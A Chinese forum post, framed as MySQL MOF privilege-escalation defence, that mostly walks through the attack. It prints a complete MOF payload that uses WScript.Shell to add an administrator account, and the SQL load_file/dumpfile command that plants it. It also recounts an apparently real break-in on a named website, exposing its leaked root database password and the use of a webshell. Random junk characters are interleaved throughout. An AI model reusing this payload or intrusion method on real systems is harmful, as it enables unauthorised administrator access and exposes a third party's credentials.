Mysql mof扩展漏洞防范方法
7 }* m6 @4 W. N7 _8 r8 V5 M7 }; k" |, b1 a0 L, y) ~
网上公开的一些利用代码: y3 Q/ @3 w0 m) L2 `
4 r0 o3 H" T6 p
#pragma namespace(“\\\\.\\root\\subscription”)
2 G5 l( w9 A9 I# J {- H* }1 ]% d
instance of __EventFilter as $EventFilter { EventNamespace = “Root\\Cimv2″; Name = “filtP2″; Query = “Select * From __InstanceModificationEvent ” “Where TargetInstance Isa \”Win32_LocalTime\” ” “And TargetInstance.Second = 5″; QueryLanguage = “WQL”; }; instance of ActiveScriptEventConsumer as $Consumer { Name = “consPCSV2″; ScriptingEngine = “JScript”; ScriptText = “var WSH = new ActiveXObject(\”WScript.Shell\”)\nWSH.run(\”net.exe user admin admin /add\”)”; }; instance of __FilterToConsumerBinding { Consumer = $Consumer; Filter = $EventFilter; };
) N, I5 b$ _) d9 D% ]7 ?
3 m1 o4 k5 u" M9 r " c+ |% V- h' K( T
+ {% Z4 q) m0 i/ ~) [ z; r6 d
8 Q2 h6 {9 G& m, ?' c! @; H& w1 p. l( ~
连接mysql数据库后执行: select load_file(‘C:\\RECYCLER\\nullevt.mof’) into dumpfile ‘c:/windows/system32/wbem/mof/nullevt.mof’;
( t8 l8 R9 `0 ?( {2 G从上面代码来看得出解决办法:4 l. h( i% I/ I0 z ?4 v# L* K) L
. h' e0 f# Y0 X, U: p: S
1、mysql用户权限控制,禁止 “load_file”、”dumpfile”等函数
# u, H$ D! A4 ]3 ^5 H! U. Z
/ `' Z0 x8 j# d1 R$ ] Y8 D2、禁止使用”WScript.Shel”组件
4 s/ U( J3 f' W- T: z+ `- _1 ~' f) Z# L3 Z; r
3、目录权限c:/windows/system32/wbem/mof/ 删除内置特殊组CREATOR OWNER% L- e- _3 A: D/ Y o
6 I3 ^& r4 Q& y- Z5 w8 y* p
当然上面是网上说的 感觉需要的权限很大 比如 root 还有mysql外链昨天碰到了就给大家演示下+ a; y, @! ~& w/ K" [9 R! Z- h
/ i$ W) `% T+ m" A: N6 w4 p- t
事情是这样发生的 一机油在论坛提问我就看了下 发现已经有大牛搞下了 说是用是 mysql mof扩展提权& [5 b% O" ~2 d: A. N8 @
. Q7 u: t1 p6 t8 w- _' L
但是小菜发现没有听过于是赶紧去查资料学习…就有了上面的来着网上的内容; b$ q T* u5 D
5 w1 d2 Q7 R! _8 ]- _+ _看懂了后就开始练手吧
, z+ V. ^& t+ u M$ |9 G
* _: G/ R( G9 L% M& Rhttp://www.webbmw.com/config/config_ucenter.php 一句话 a
- X' W, K" _. _
( M8 Z9 C4 r9 w. g2 N$_config['db']['1']['dbhost'] = ‘localhost’; $_config['db']['1']['dbuser'] = ‘root’; $_config['db']['1']['dbpw'] = ‘tfr226206′; $_config['db']['1']['dbcharset'] = ‘gbk’; $_config['db']['1']['pconnect'] = ’0′; $_config['db']['1']['dbname'] = ‘webbmw’; $_config['db']['1']['tablepre'] = ‘pre_’; $_config['db']['common']['slave_except_table'] = ”; 有root密码啊。
/ q; ~7 u( w* D: {. |( k6 ~& \( i+ ~
于是直接用菜刀开搞
; S( I& f* E' @
W; H% P* }9 A7 Z2 M0 d上马先
& t) S, \9 E- O* X' }
4 Y" H0 X; p' [9 I既然有了那些账号 之类的 于是我们就执行吧…….
; p/ @3 ]* h% L5 |) k; p5 C" E2 z# j$ z3 N, T5 l0 `
小小的说下 r- X" ]3 ?' j3 n+ ^/ |& X' _
" p, V) j; s1 v. Y5 R' Z6 G在这里第1次执行未成功 原因未知
* a J+ k: }+ m
2 a6 W4 S1 W. @& y1 I& s& j& T我就猜想是否是因为我们执行的代码有问题 于是我就去我wooyun找的代码。6 ?$ M) P5 M: G s, ?
9 s; N7 t& L" w2 V) |9 l#pragma namespace(“\\\\.\\root\\subscription”). y3 \* w* v! F( Z0 r% k
, k1 p# |( @, @# f+ ^( H. v$ Winstance of __EventFilter as $EventFilter { EventNamespace = “Root\\Cimv2″; Name = “filtP2″; Query = “Select * From __InstanceModificationEvent ” “Where TargetInstance Isa \”Win32_LocalTime\” ” “And TargetInstance.Second = 5″; QueryLanguage = “WQL”; }; instance of ActiveScriptEventConsumer as $Consumer { Name = “consPCSV2″; ScriptingEngine = “JScript”; ScriptText = “var WSH = new ActiveXObject(\”WScript.Shell\”)\nWSH.run(\”net.exe user test test /add\”)”; }; instance of __FilterToConsumerBinding { Consumer = $Consumer; Filter = $EventFilter; };
- W$ H! p2 _& I( X
& V0 c; d" a- u7 [3 n我是将文件放到C:\WINDOWS\temp\1.mof3 G% o& }, a) f7 r3 `
, l) z; Y$ Z4 N& O) G& \* f u所以我们就改下执行的代码
+ u. E2 a o, t4 Y- T# L
+ \! b. p1 b3 s/ O) Y& [" f! qselect load_file(‘C:\WINDOWS\temp\1.mof‘) into dumpfile ‘c:/windows/system32/wbem/mof/nullevt.mof’;+ q- z5 C' g7 p+ T9 c
) _: n# f" k8 c( q% B
! |: n* b; K7 h' x" |
; P! G/ M. j7 p$ K& r/ @1 n$ p8 I但是 你会发现账号还是没有躺在那里。。
3 P* h0 J: \/ ~8 ^, t: S8 P, @3 V" ]; ^/ J
于是我就感觉蛋疼
9 p0 f+ J! E2 Y) I* I
! R$ g6 ~1 D( ^1 U; [就去一个一个去执行 但是执行到第2个 mysql时就成功了………1 |2 l7 y' M" n8 u5 }: v
- W+ C7 w5 H" ^
% V k# v$ A! K( x; v A8 @2 c1 ]
! |- X! c3 z; {但是其他库均不成功…! E- k% o6 X6 n9 i
+ y7 K3 \$ @' V3 Y% N S我就很费解呀 到底为什么不成功求大牛解答…7 f! z! l) ~" Q/ u2 K# N8 \9 C
' x* q4 v/ s9 L& K1 e
5 w7 r. e1 b! h6 Q6 n: d+ O6 {8 k" _# o P w0 f; A7 y
|
发表于 2013-1-4 19:49:49
收藏
支持
反对